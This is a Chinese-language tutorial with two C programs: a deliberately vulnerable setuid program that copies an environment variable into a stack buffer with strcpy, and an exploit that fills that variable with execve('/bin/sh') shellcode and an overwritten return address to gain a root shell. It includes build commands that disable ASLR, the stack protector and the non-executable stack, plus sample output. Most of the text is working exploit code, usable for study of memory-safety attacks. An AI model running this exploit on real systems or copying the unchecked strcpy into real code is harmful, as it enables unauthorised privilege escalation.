/* buger.c */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void)
{
char buffer[128] = {0};
char *envp = NULL;
printf("buffer address is: %p\n", &buffer);
envp = getenv("KIRIKA");
if (envp)
strcpy(buffer, envp);
return 0;
}
代表有漏洞的可执行程序,并且该文件编译后的可执行文件设置有suid位,可以被利用提权
/* hacker.c */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
extern char **environ;
int main(int argc, char **argv)
{
char large_string[256] = {0};
long *long_ptr = (long *)large_string;
char shellcode[] = {"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05"};
unsigned long int bufaddr = strtoul(argv[2], NULL, 16);
int i;
for (i = 0; i < 6; i++) {
large_string[152 + i] = bufaddr & 0xff;
bufaddr >>= 8;
}
for (i = 0; i < 152; i++)
large_string[i] = 'A';
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
setenv("KIRIKA", large_string, 1);
execle(argv[1], argv[1], NULL, environ);
return 0;
}
代表恶意可执行程序,利用buger程序实现提权
运行:
1: echo 0 > /proc/sys/kernel/randomize_va_space
2: gcc -z execstack -fno-stack-protector buger.c -o buger -g
3: chmod +s buger
4: gcc -z execstack -fno-stack-protector hacker.c -o hacker -g
5: ./hacker ./buger 0xff
buffer address is: 0x7fffffffddb0
Segmentation fault (core dumped)
6: ./hacker ./buger 0x7fffffffddb0
buffer address is: 0x7fffffffddb0
# exit
提权流程是这样的:
1: 设置环境变量KIRIKA的值, 注意一点是这是一个字符串, 如果shellcode里面有自负0x00就会出问题,因为字符串是以0x00结尾的
"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05" //34B
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //118B
"\x78\x56\x34\x12\xff\x7f"